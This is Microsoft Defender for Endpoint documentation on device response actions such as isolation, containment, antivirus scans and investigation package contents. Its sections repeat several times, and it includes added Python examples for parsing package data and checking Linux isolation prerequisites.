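            counts[r["src-ip"]] = counts.get(r["src-ip"], 0) + 1
    return counts

# Constructed sample content standing in for files extracted from a package.
SAMPLE_AUTORUNS = {
    "HKLM_Run.txt": "Name  Data\r\nOneDrive  C:\\Program Files\\OneDrive\\OneDrive.exe\r\n",
    "HKLM_RunOnce.txt": ASEP_MISSING + "\r\n",
}
SAMPLE_NETSTAT = """  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49713         203.0.113.10:443       ESTABLISHED     4120
  TCP    10.0.0.5:49800         10.0.0.20:445          ESTABLISHED     4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1052
  TCP    [::]:445               [::]:0                 LISTENING       4
  UDP    0.0.0.0:5353           *:*                                    2204
"""
SAMPLE_PFIREWALL = """#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-01-19 10:15:02 DROP TCP 198.51.100.7 10.0.0.5 51234 3389 52 S 123456 0 64240 - - - RECEIVE
2024-01-19 10:15:02 DROP TCP 198.51.100.7 10.0.0.5 51235 445 52 S 123457 0 64240 - - - RECEIVE
2024-01-19 10:15:03 ALLOW TCP 10.0.0.5 203.0.113.10 49713 443 0 - 0 0 0 - - - SEND
"""
```

The internal address list is explicit rather than `ipaddress.is_private` because Python counts the documentation ranges (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) as private, which would hide exactly the kind of address used in the sample. The PID carried on each external session is the join key into the Processes .CSV from the same package, and an Autoruns file reported as absent needs no review because nothing was registered at that location.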

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

Important

This action is supported for macOS and Linux for client version 101.98.84 and
above. You can also use live response to run the action. For more information
on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus
solutions, whether Microsoft Defender Antivirus is the active antivirus solution
or not. Microsoft Defender Antivirus can be in Passive mode. For more
information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

Note

When triggering a scan using a Defender for Endpoint response action, the Microsoft
Defender Antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU
impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is
a limit of 50% maximum CPU load during a scan. For more information, see
configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

Important

This action is available for devices on Windows 10, version 1709 or later,
Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code
integrity policy formats and signing requirements. For more information, see
Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft-issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

Note

You can reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

Important

Isolating devices from the network is supported for macOS for client version
101.98.84 and above. You can also use live response to run the action. For
more information on live response, see Investigate entities on devices using
live response.
Full isolation is available for devices running Windows 11, Windows 10,
version 1703 or later, Windows Server 2022, Windows Server 2019, Windows
Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported Microsoft
Defender for Endpoint on Linux versions listed in System requirements. Ensure that
the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel
with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and
CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709
or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed.
Therefore, devices that are behind a full VPN tunnel won't be able to reach
the Microsoft Defender for Endpoint cloud service after the device is isolated.
We recommend using a split-tunneling VPN for Microsoft Defender for
Endpoint and Microsoft Defender Antivirus cloud-based protection-related
traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation
actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For
more information, see Create and manage device groups.
Exclusions are not supported for macOS or Linux isolation.
An isolated device is removed from isolation when an administrator modifies
or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all
child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you have more control over the network
isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for
Business connectivity (a.k.a. 'Selective Isolation').

Note

You can reconnect the device to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate with the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.
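The Linux prerequisites in the Important block above (iptables, ip6tables and the three kernel options) are worth verifying before an incident, since a device that fails them cannot be isolated when it matters. The following Python is an added example, not part of the Microsoft documentation: it parses a kernel config file, reports which required options are neither built in nor available as a module, and checks that the two binaries are on PATH. The config line layout (`CONFIG_X=y`, `CONFIG_X=m`, `# CONFIG_X is not set`) and the path /boot/config-$(uname -r) are assumptions about a typical distribution, and the sample config texts are constructed. It also accepts CONFIG_NETFILTER_XT_MATCH_OWNER, the name under which later kernels provide the owner match, as satisfying the CONFIG_IP_NF_MATCH_OWNER requirement; that equivalence is the editor's addition, not a statement from the page.

```python
# Added example, not from the Microsoft documentation: verify the Linux prerequisites the
# isolation note lists (iptables, ip6tables and the named kernel options) on a host.
# Assumed input format: a /boot/config-<release> file with lines such as CONFIG_X=y,
# CONFIG_X=m or "# CONFIG_X is not set".
from __future__ import annotations
import re
import shutil
import subprocess
from pathlib import Path

# Kernel options named on the page. The owner match is provided by later kernels as
# CONFIG_NETFILTER_XT_MATCH_OWNER, so either spelling satisfies that requirement.
REQUIRED_OPTIONS = {
    "CONFIG_NETFILTER": ("CONFIG_NETFILTER",),
    "CONFIG_IP_NF_IPTABLES": ("CONFIG_IP_NF_IPTABLES",),
    "CONFIG_IP_NF_MATCH_OWNER": ("CONFIG_IP_NF_MATCH_OWNER", "CONFIG_NETFILTER_XT_MATCH_OWNER"),
}
REQUIRED_TOOLS = ("iptables", "ip6tables")

_SET_RE = re.compile(r"^(CONFIG_\w+)=([ym])$")
_UNSET_RE = re.compile(r"^# (CONFIG_\w+) is not set$")


def parse_kernel_config(text: str) -> dict[str, str]:
    """Map each option to 'y' (built in), 'm' (module) or 'n' (explicitly unset)."""
    opts: dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if m := _SET_RE.match(line):
            opts[m.group(1)] = m.group(2)
        elif m := _UNSET_RE.match(line):
            opts[m.group(1)] = "n"
    return opts


def missing_kernel_options(opts: dict[str, str]) -> list[str]:
    """Requirements for which no accepted option name is 'y' or 'm'."""
    return [req for req, names in REQUIRED_OPTIONS.items()
            if not any(opts.get(n, "n") in ("y", "m") for n in names)]


def missing_tools(which=shutil.which) -> list[str]:
    """Prerequisite binaries not found on PATH; `which` is injectable for testing."""
    return [t for t in REQUIRED_TOOLS if which(t) is None]


def check_host(config_path: Path | None = None) -> dict:
    """Live check of this host: reads /boot/config-$(uname -r) unless a path is given."""
    if config_path is None:
        rel = subprocess.run(["uname", "-r"], capture_output=True, text=True, check=True)
        config_path = Path("/boot/config-" + rel.stdout.strip())
    opts = parse_kernel_config(config_path.read_text()) if config_path.is_file() else {}
    return {"config": str(config_path), "config_found": bool(opts),
            "missing_options": missing_kernel_options(opts),
            "missing_tools": missing_tools()}


# Constructed samples: an older kernel with the owner match built as a module, and a
# newer one where the owner match is explicitly disabled.
SAMPLE_OK = """CONFIG_NETFILTER=y
CONFIG_IP_NF_IPTABLES=m
CONFIG_IP_NF_MATCH_OWNER=m
"""
SAMPLE_MISSING_OWNER = """CONFIG_NETFILTER=y
CONFIG_IP_NF_IPTABLES=m
# CONFIG_NETFILTER_XT_MATCH_OWNER is not set
"""
```

Run `check_host()` on the device itself; a non-empty `missing_options` or `missing_tools` list means isolation will not take effect on that host until the kernel or package set is fixed. If the distribution ships the config only as /proc/config.gz, pass a decompressed copy of that file instead.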

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive. There's a downloadable script for these instances that you can run to
forcibly release devices from isolation. The script is available through a link in the UI.

Note

Admins and users with the 'Manage security settings in Security Center' permission can
forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from
isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device, any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

Note

Blocking incoming and outgoing communication with a 'contained' device is
supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:

Note

It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (it may take up to 5 minutes to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify that the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You can stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access, and helping prevent attacks, specifically
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

Note

Blocking incoming communication with a "contained" user is supported on
onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Server
2012 R2 and 2016 with the modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised, a "Contain User"
policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action
Center. Here, you can see when the action occurred, and which users in your
organization were contained:

Furthermore, after an identity is considered "contained", that user will be blocked by
Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted to access and potential attack techniques:

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane, select Undo.
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo.

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just regarding a potentially compromised device,
but also to better understand complex threats, targeted attack notifications that you
get, or if you need more information about the alerts, or a threat intelligence context
that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and whether the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1
Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation
package. After taking action on devices, you can check activity details on the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file.

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags

Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.
Initiate Automated Investigation


You can start a new general purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to an ongoing Automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated


investigations.
Initiate live response session
Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic


data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices


As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.


3. Select Action center from the response actions section of the device page.

4. Click the Package collection package available to download the collection


package.

For Windows devices, the package contains the following folders:

ノ Expand table
Folder Description

Autoruns Contains a set of files that each represent the content of


the registry of a known auto start entry point (ASEP) to
help identify attacker's persistency on the device.

NOTE: If the registry key is not found, the file


will contain the following message: "ERROR:
The system was unable to find the specified
registry key or value."

Installed programs This .CSV file contains the list of installed programs that
can help identify what is currently installed on the device.
For more information, see Win32_Product class .

Network connections This folder contains a set of data points related to the
connectivity information that can help in identifying
connectivity to suspicious URLs, attacker's command and
control (C&C) infrastructure, any lateral movement, or
remote connections.
ActiveNetConnections.txt: Displays protocol
statistics and current TCP/IP network connections.
Provides the ability to look for suspicious
connectivity made by a process.
Arp.txt: Displays the current address resolution
protocol (ARP) cache tables for all interfaces. ARP
cache can reveal other hosts on a network that have
been compromised or suspicious systems on the
network that might have been used to run an
internal attack.
DnsCache.txt: Displays the contents of the DNS
client resolver cache, which includes both entries
preloaded from the local Hosts file and any recently
obtained resource records for name queries
resolved by the computer. This can help in
identifying suspicious connections.
IpConfig.txt: Displays the full TCP/IP configuration
for all adapters. Adapters can represent physical
interfaces, such as installed network adapters, or
logical interfaces, such as dial-up connections.
FirewallExecutionLog.txt and pfirewall.log

NOTE: The pfirewall.log file must exist in


%windir%\system32\logfiles\firewall\pfirewall.
log, so it will be included in the investigation
package. For more information on creating
Folder Description

the firewall log file, see Configure the


Windows Defender Firewall with Advanced
Security Log

Prefetch files Windows Prefetch files are designed to speed up the


application startup process. It can be used to track all the
files recently used in the system and find traces for
applications that might have been deleted but can still be
found in the prefetch file list.
Prefetch folder: Contains a copy of the prefetch files
from %SystemRoot%\Prefetch . NOTE: It is suggested
to download a prefetch file viewer to view the
prefetch files.
PrefetchFilesList.txt: Contains the list of all the
copied files that can be used to track if there were
any copy failures to the prefetch folder.

Processes Contains a .CSV file listing the running processes and


provides the ability to identify current processes running
on the device. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks Contains a .CSV file listing the scheduled tasks, which can
be used to identify routines performed automatically on a
chosen device to look for suspicious code that was set to
run automatically.

Security event log Contains the security event log, which contains records of
login or logout activity, or other security-related events
specified by the system's audit policy.

NOTE: Open the event log file using Event


viewer.

Services Contains a .CSV file that lists services and their states.

Windows Server Message Lists shared access to files, printers, and serial ports and
Block (SMB) sessions miscellaneous communications between nodes on a
network. This can help identify data exfiltration or lateral
movement.
Contains files for SMBInboundSessions and
SMBOutboundSession.
Folder Description

NOTE: If there are no sessions (inbound or


outbound), you'll get a text file that tells you
that there are no SMB sessions found.

System Information Contains a SystemInformation.txt file that lists system


information such as OS version and network cards.

Temp Directories Contains a set of text files that lists the files located in
%Temp% for every user in the system.
This can help to track suspicious files that an attacker may
have dropped on the system.

NOTE: If the file contains the following


message: "The system cannot find the path
specified", it means that there is no temp
directory for this user, and might be because
the user didn't log in to the system.

Users and Groups Provides a list of files that each represent a group and its
members.

WdSupportLogs Provides the MpCmdRunLog.txt and MPSupportFiles.cab

NOTE: This folder will only be created on


Windows 10, version 1709 or later with
February 2020 update rollup or more recent
installed:

Win10 1709 (RS3) Build 16299.1717:


KB4537816
Win10 1803 (RS4) Build 17134.1345:
KB4537795
Win10 1809 (RS5) Build 17763.1075:
KB4537818
Win10 1903/1909 (19h1/19h2) Builds
18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls This file is a summary of the investigation package


collection, it contains the list of data points, the command
used to extract the data, the execution status, and the
Folder Description

error code if there is failure. You can use this report to


track if the package includes all the expected data and
identify if there were any errors.

The collection packages for macOS and Linux devices contain the following:

ノ Expand table

Applications
    macOS: A list of all installed applications
    Linux: Not applicable

Disk volume
    macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
    Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
    macOS: A list of all open files with the corresponding processes using these files
    Linux: A list of all open files with the corresponding processes using these files

History
    macOS: Shell history
    Linux: Not applicable

Kernel modules
    macOS: All loaded modules
    Linux: Not applicable

Network connections
    macOS: Active connections; active listening connections; ARP table; firewall rules; interface configuration; proxy settings; VPN settings
    Linux: Active connections; active listening connections; ARP table; firewall rules; IP list; proxy settings

Processes
    macOS: A list of all running processes
    Linux: A list of all running processes

Services and scheduled tasks
    macOS: Certificates; configuration profiles; hardware information
    Linux: CPU details; hardware information; operating system information

System security information
    macOS: Extensible Firmware Interface (EFI) integrity information; firewall status; Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
    Linux: Not applicable

Users and groups
    macOS: Login history; sudoers
    Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

Important

This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

Note

When triggering a scan using the Defender for Endpoint response action, the Microsoft Defender Antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is a limit of 50% maximum CPU load during a scan. For more information, see configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

Important

This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

Important

Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported versions of Microsoft Defender for Endpoint on Linux listed in System requirements. Ensure that the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For more information, see Create and manage device groups.
Exclusions for both macOS and Linux isolation are not supported.
An isolated device is removed from isolation when an administrator modifies or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for Business connectivity (also known as 'Selective Isolation').

Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation

The device isolation feature is an invaluable tool for safeguarding devices against external threats. However, there are instances when isolated devices become unresponsive. There's a downloadable script for these instances that you can run to forcibly release devices from isolation. The script is available through a link in the UI.

Note

Admins and users with the 'Manage security settings in Security Center' permission can forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release a device from isolation:

1. On the device page, select Download script to force-release a device from isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements

The minimum requirements for the 'forcibly release device from isolation' feature are:

Supports only Windows
The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user

When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

Note

The notification is not available on non-Windows platforms.

Contain devices from the network

When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device, any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

Note

Blocking incoming and outgoing communication with a 'contained' device is supported on onboarded Microsoft Defender for Endpoint Windows 10 and Windows Server 2019+ devices.

How to contain a device

1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.

Contain a device from the device page

A device can also be contained from the device page by selecting Contain device from
the action bar:

Note

It can take up to 5 minutes for the details about a newly contained device to reach Microsoft Defender for Endpoint onboarded devices.

Important

If a contained device changes its IP address, then all Microsoft Defender for Endpoint onboarded devices will recognize this and start blocking communications with the new IP address. The original IP address will no longer be blocked (it may take up to 5 minutes to see these changes).
In cases where the contained device's IP is used by another device on the network, there will be a warning while containing the device, with a link to advanced hunting (with a pre-populated query). This will provide visibility into the other devices using the same IP to help you make a conscious decision about whether to continue with containing the device.
In cases where the contained device is a network device, a warning will appear with a message that this may cause network connectivity issues (for example, containing a router that is acting as a default gateway). At this point, you'll be able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device

You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network

When an identity in your network might be compromised, you must prevent that identity from accessing the network and different endpoints. Defender for Endpoint can "contain" an identity, blocking it from access and helping prevent attacks, specifically ransomware. When an identity is contained, any supported Microsoft Defender for Endpoint onboarded device will block incoming traffic in specific protocols related to attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action can significantly help to reduce the impact of an attack. When an identity is contained, security operations analysts have extra time to locate, identify and remediate the threat to the compromised identity.

Note

Blocking incoming communication with a "contained" user is supported on onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense version 8740 and higher), Windows Server 2019+ devices, and Windows Server 2012 R2 and 2016 with the modern agent.

How to contain a user

Currently, containing users is only available automatically by using automatic attack disruption. When Microsoft detects a user as being compromised, a "Contain User" policy is automatically set.

View the contain user actions

After a user is contained, you can view the action in the History view of the Action Center. Here, you can see when the action occurred, and which users in your organization were contained:

Furthermore, after an identity is considered "contained", that user will be blocked by Defender for Endpoint and cannot perform any malicious lateral movement or remote encryption on or to any supported Defender for Endpoint onboarded device. These blocks will show up as alerts to help you quickly see the devices the compromised user attempted to access and the potential attack techniques:

Undo contain user actions

You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane, select Undo.
2. Select the user from either the user inventory, Incident page side pane or alert side pane, and select Undo.

This action will restore this user's connection to the network.

Investigation capabilities with Contain User

After a user is contained, you can investigate the potential threat by viewing the blocked actions by the compromised user. In the Device timeline view, you can see information about specific events, including protocol and interface granularity, and the relevant MITRE technique associated with it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

Consult a threat expert

You can consult a Microsoft threat expert for more insights regarding a potentially compromised device or already compromised ones. Microsoft Threat Experts can be engaged directly from within Microsoft Defender XDR for timely and accurate response. Experts provide insights not just regarding a potentially compromised device, but also to better understand complex threats, targeted attack notifications that you get, or if you need more information about the alerts, or a threat intelligence context that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center

The Action center provides information on actions that were taken on a device or file. You'll be able to view the following details:

Investigation package collection
Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our Tech Community: Microsoft Defender for Endpoint Tech Community.


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2


Microsoft Defender for Business

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

